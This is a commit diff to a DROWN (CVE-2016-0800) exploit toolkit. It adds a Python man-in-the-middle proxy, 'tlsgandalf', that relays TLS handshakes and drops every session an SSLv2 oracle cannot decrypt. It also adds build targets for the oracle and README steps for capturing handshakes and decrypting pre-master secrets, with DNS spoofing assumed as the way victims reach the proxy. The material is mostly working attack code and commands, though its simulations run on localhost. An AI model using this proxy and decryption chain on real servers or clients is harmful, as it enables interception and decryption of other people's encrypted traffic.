Active DROWN attack by disconnection

Author: Tim---

Makefile

@@ -1,12 +1,18 @@
 CFLAGS=-I$(SSL_PREFIX)/include
 LDFLAGS=-Wl,-rpath,$(SSL_PREFIX)/lib -L $(SSL_PREFIX)/lib -lssl -lcrypto -ldl -lm
-OBJS=drown.o oracle.o trimmers.o decrypt.o
+DECRYPT_OBJS=drown.o oracle.o trimmers.o decrypt.o utils.o
+TRIMMABLE_OBJS=trimmable.o oracle.o trimmers.o decrypt.o utils.o
 
-drown: $(OBJS)
+all: decrypt trimmable
+
+decrypt: $(DECRYPT_OBJS)
+	gcc -g -o $@ $^ $(LDFLAGS)
+
+trimmable: $(TRIMMABLE_OBJS)
 	gcc -g -o $@ $^ $(LDFLAGS)
 
 %.o: %.c
 	gcc -g -c -o $@ $^ $(CFLAGS)
 
 clean:
-	rm drown $(OBJS)
+	rm -f decrypt trimmable $(DECRYPT_OBJS) $(TRIMMABLE_OBJS)

README.md

@@ -22,7 +22,7 @@ Now let's compile the exploit :
 
 To decrypt an encrypted pre-master secret c, using the public key of the server at the address host:port, we will use the following command :
 
-    ./drown host:port certfile c
+    ./decrypt host:port certfile c
 
 ## Passive attack
 
@@ -33,7 +33,7 @@ In this case, we can decrypt some TLS sessions if :
 * the server is vulnerable to CVE-2016-0800 ;
 * there is a sufficient number of session.
 
-## Simulation
+### Simulation
 
 To simulate this scenario, want to record some TLS handshakes between a client and a server.
 We will use the old version of OpenSSL we have installed to create a server, and initiate a lot of sessions.
@@ -42,7 +42,7 @@ We will capture the handshakes with tshark.
     cd /path/to/prefix
     ./bin/openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 123
     ./bin/openssl s_server -cert cert.pem -key key.pem -accept 4433 -www
-    tshark -i lo -w handshakes.cap
+    tshark -i lo -w handshakes.cap tcp port 4433
     for i in $(seq 1000) ; do (echo 'GET / HTTP/1.1\r\n'; sleep 0.1) | ./bin/openssl s_client -connect 127.0.0.1:4433 -cipher kRSA; done
 
 We can now get the encrypted pre-master secrets for each session with :
@@ -55,7 +55,33 @@ To decrypt these handshakes, we need an OpenSSL server accepting SSLv2 connectio
 
 We can now decrypt the encrypted pre-master secret : 
 
-    tshark -r handshakes.cap -d tcp.port==4433,ssl -T fields -e ssl.handshake.epms -Y ssl.handshake.epms | tr -d : | ./drown localhost:4434 cert.pem > pms.txt
+    tshark -r handshakes.cap -d tcp.port==4433,ssl -T fields -e ssl.handshake.epms -Y ssl.handshake.epms | tr -d : | ./decrypt localhost:4434 cert.pem > pms.txt
 
 After some time and if we're lucky, we will have some results in pms.txt. You can use this file in Wireshark to decrypt the content of the TLS session (Protocol Preferences > SSL > (Pre)-Master-Secret log filename).
 
+## Gandalf attack
+
+The passive attack allows us decrypt some TLS sessions (around 1/100 using 70 trimmers).
+If we want to see all the traffic between the client and the server, we can act as a MITM proxy between them
+and only allow sessions that we know we can decrypt.
+This will be effective if the client doesn't mind getting a TLS handshake abruptly closed, and if it tries hard to reconnect.
+This will typically work if the client is an automated process (and not a human !).
+
+### Simulation
+
+We start our SSLv2 and TLS servers :
+
+    ./bin/openssl s_server -cert cert.pem -key key.pem -accept 4433 -www
+    ./bin/openssl s_server -cert cert.pem -key key.pem -accept 4434 -www -ssl2
+
+We start our MITM server on port 4455 :
+    tlsgandalf 127.0.0.1:4455 127.0.0.1:4433 127.0.0.1:4434 cert.pem
+
+We will record the packets with tshark, and start a bunch of sessions.
+We assume that the clients connects to our proxy (because of DNS spoofing, or something else) :
+    tshark -i lo -w handshakes.cap tcp port 4455
+    for i in $(seq 1000) ; do (echo 'GET / HTTP/1.1\r\n'; sleep 1) | ./bin/openssl s_client -connect 127.0.0.1:4455 -cipher kRSA; done
+
+When a trimmer is found for one handshake, the proxy will print it to stdout. 
+We can now process as before to decrypt the session.
+

decrypt.h

@@ -1,7 +1,7 @@
 #ifndef DECRYPT_H
 #define DECRYPT_H
 
-#include "drown.h"
+#include "utils.h"
 
 void decrypt(drown_ctx *dctx);
 

drown.c

@@ -1,127 +1,11 @@
 #include <openssl/bn.h>
 #include <openssl/err.h>
 #include <openssl/ssl.h>
-#include "drown.h"
+#include "utils.h"
 #include "trimmers.h"
 #include "decrypt.h"
 
 
-void drown_new(drown_ctx * dctx)
-{
-    dctx->ctx = BN_CTX_new();
-    SSL_ASSERT(dctx->ctx != NULL);
-
-    dctx->n = BN_new();
-    SSL_ASSERT(dctx->n != NULL);
-
-    dctx->e = BN_new();
-    SSL_ASSERT(dctx->e != NULL);
-
-    dctx->c = BN_new();
-    SSL_ASSERT(dctx->c != NULL);
-
-    dctx->s = BN_new();
-    SSL_ASSERT(dctx->s != NULL);
-
-    dctx->mt = BN_new();
-    SSL_ASSERT(dctx->mt != NULL);
-}
-
-void drown_free(drown_ctx * dctx)
-{
-    BN_free(dctx->mt);
-    BN_free(dctx->s);
-    BN_free(dctx->c);
-    BN_free(dctx->e);
-    BN_free(dctx->n);
-    BN_CTX_free(dctx->ctx);
-}
-
-void read_public_key(drown_ctx * dctx, char *filename)
-{
-    // Read file
-    FILE * fp = fopen(filename, "r");
-    MY_ASSERT(fp != NULL, "can't open certificate file");
-
-    // Read cert
-    X509 *cert = PEM_read_X509(fp, NULL, NULL, NULL);
-    MY_ASSERT(cert != NULL, "file is not a certificate");
-
-    // Read public key
-    EVP_PKEY * pkey = X509_get_pubkey(cert);
-    MY_ASSERT(pkey != NULL, "can't get public key from certificate");
-
-    // Check RSA key
-    MY_ASSERT(pkey->type == EVP_PKEY_RSA, "public key is not RSA");
-    MY_ASSERT(EVP_PKEY_bits(pkey) == 2048, "only RSA-2048 is supported for now");
-
-    // Read RSA key
-    RSA *rsa = EVP_PKEY_get1_RSA(pkey);
-
-    // Copy the public key
-    BN_copy(dctx->n, rsa->n);
-    BN_copy(dctx->e, rsa->e);
-
-    RSA_free(rsa);
-    EVP_PKEY_free(pkey);
-    X509_free(cert);
-    fclose(fp);
-}
-
-int pkcs1_v1_5_unpad(BIGNUM *src, BIGNUM *dst)
-{
-    unsigned char srcbin[256] = {0};
-    BN_bn2bin(src, srcbin + 256 - BN_num_bytes(src));
-    int i;
-
-    if(srcbin[i++] != 0)
-        return -1;
-    if(srcbin[i++] != 2)
-        return -1;
-    while(srcbin[i])
-    {
-        i++;
-        if(i >= 256)
-            return -1;
-    }
-    i++;
-    BN_bin2bn(&srcbin[i], 256 - i, dst);
-    return 256 - i;
-}
-
-void print_hexbuf(const unsigned char *buffer, long len)
-{
-    char hexdigits[] = "0123456789abcdef";
-    for(int i = 0; i < len; i++)
-    {
-        int nib1 = buffer[i] >> 4;
-        int nib2 = buffer[i] & 15;
-        printf("%c%c", hexdigits[nib1], hexdigits[nib2]);
-    }
-}
-
-void dump_wireshark(char *c_hex, BIGNUM *mt)
-{
-    // Now PCKS#1 v1.5 unpad the message
-    unsigned char bin[256] = {0};
-    BN_bn2bin(mt, bin + 256 - BN_num_bytes(mt));
-    MY_ASSERT(bin[0] == 0, "decrypted message is not properly padded");
-    MY_ASSERT(bin[1] == 2, "decrypted message is not properly padded");
-    int i = 2;
-    while(bin[i])
-    {
-        i++;
-        MY_ASSERT(i < 256, "decrypted message is not properly padded");
-    }
-    i++;
-
-    // We can now print the unpadded message
-    // (in Wireshark format)
-    printf("RSA ");
-    printf("%.16s ", c_hex);
-    print_hexbuf(&bin[i], 256-i);
-    printf("\n");
-}
 
 int main(int argc, char *argv[])
 {

ssl_locl.h

@@ -29,4 +29,6 @@ int     ssl2_new(SSL *s);
 
 int ssl_get_new_session(SSL *s, int session);
 
+const SSL_METHOD *SSLv2_method(void);
+
 #endif

tlsgandalf.py

@@ -0,0 +1,150 @@
+#!/usr/bin/env python3
+
+import socket
+from tlslite.api import *
+from tlslite.constants import ContentType, HandshakeType
+from binascii import hexlify
+import subprocess
+import sys
+
+def handshakeProxy(c_conn, s_conn, oracle):
+    s_conn._handshakeStart(client=False)
+    c_conn._handshakeStart(client=True)
+
+    s_settings = HandshakeSettings()
+    c_settings = HandshakeSettings()
+
+
+    # CLIENT HELLO          C -> S
+    for result in s_conn._getMsg(ContentType.handshake,
+                           HandshakeType.client_hello):
+        if result in (0,1): yield result
+        else: break
+    clientHello = result
+
+    c_conn.version = clientHello.client_version
+
+    for result in c_conn._sendMsg(clientHello):
+        yield result
+
+
+    # SERVER HELLO           S -> C
+    for result in c_conn._getMsg(ContentType.handshake,
+                           HandshakeType.server_hello):
+        if result in (0,1): yield result
+        else: break
+    serverHello = result
+
+    s_conn.version = serverHello.server_version
+    cipherSuite = serverHello.cipher_suite
+
+    for result in s_conn._sendMsg(serverHello):
+        yield result
+
+
+    # CERTIFICATE           S -> C
+    for result in c_conn._getMsg(ContentType.handshake,
+                           HandshakeType.certificate,
+                           serverHello.certificate_type):
+        if result in (0,1): yield result
+        else: break
+    certificate = result
+
+    for result in s_conn._sendMsg(certificate):
+        yield result
+
+    # SERVER HELLO DONE     S -> C
+    for result in c_conn._getMsg(ContentType.handshake,
+                           HandshakeType.server_hello_done):
+        if result in (0,1): yield result
+        else: break
+    serverHelloDone = result
+
+    for result in s_conn._sendMsg(serverHelloDone):
+        yield result
+
+    # CLIENT KEY EXCHANGE   C -> S
+    for result in s_conn._getMsg(ContentType.handshake,
+                           HandshakeType.client_key_exchange,
+                           cipherSuite):
+        if result in (0,1): yield result
+        else: break
+    clientKeyExchange = result
+
+    # Ask the oracle if we continue
+    epms = clientKeyExchange.encryptedPreMasterSecret
+    if not oracle(epms):
+        # YOU SHALL NOT PASS !
+        return
+
+    print(hexlify(epms).decode())
+
+    # If it's ok, continue
+    for result in c_conn._sendMsg(clientKeyExchange):
+        yield result
+
+
+    # Now we don't care about the SSL protocol, we just forward the records
+    # No, that doesn't look like the right way to do it.
+    try:
+        while True:
+            for cdata, sdata in zip(c_conn._recordLayer._recordSocket.recv(), s_conn._recordLayer._recordSocket.recv()):
+                if cdata in (0, 1):
+                    yield cdata
+                else:
+                    for result in s_conn._recordLayer._recordSocket._sockSendAll(cdata[0].write() + cdata[1]):
+                        yield result
+                if sdata in (0, 1):
+                    yield sdata
+                else:
+                    for result in c_conn._recordLayer._recordSocket._sockSendAll(sdata[0].write() + sdata[1]):
+                        yield result
+    except TLSAbruptCloseError:
+        pass
+
+
+if __name__ == "__main__":
+    if len(sys.argv) != 5:
+        print("Usage: {} listenaddr connectaddr oracleaddr cert".format(sys.argv[0]))
+        exit(0)
+
+    # Get parameters
+    listenaddr, connectaddr, oracleaddr, cert = sys.argv[1:]
+    listenaddr = (listenaddr.split(':')[0], int(listenaddr.split(':')[1]))
+    connectaddr = (connectaddr.split(':')[0], int(connectaddr.split(':')[1]))
+    oracleaddr = (oracleaddr.split(':')[0], int(oracleaddr.split(':')[1]))
+
+    oracle = lambda epms: not subprocess.call(["./trimmable", '{}:{}'.format(*oracleaddr), cert, hexlify(epms)])
+
+    # Setup server socket
+    bindsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+    bindsock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
+    bindsock.bind(listenaddr)
+    print("Listening on {}:{}".format(*listenaddr), file=sys.stderr)
+    bindsock.listen(1)
+
+    while True:
+        # Wait for client
+        s_sock, fromaddr = bindsock.accept()
+        print("Connection from {}:{}".format(*fromaddr), file=sys.stderr)
+
+        # Open connection to the TLS server
+        c_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+        c_sock.connect(connectaddr)
+        print("Proxying to {}:{}".format(*connectaddr), file=sys.stderr)
+
+        c_sock.setblocking(False)
+        s_sock.setblocking(False)
+
+        c_conn = TLSConnection(c_sock)
+        s_conn = TLSConnection(s_sock)
+
+        # Proxy the connection
+        for res in handshakeProxy(c_conn, s_conn, oracle):
+            pass
+
+        c_sock.close()
+        s_sock.close()
+        print(file=sys.stderr)
+
+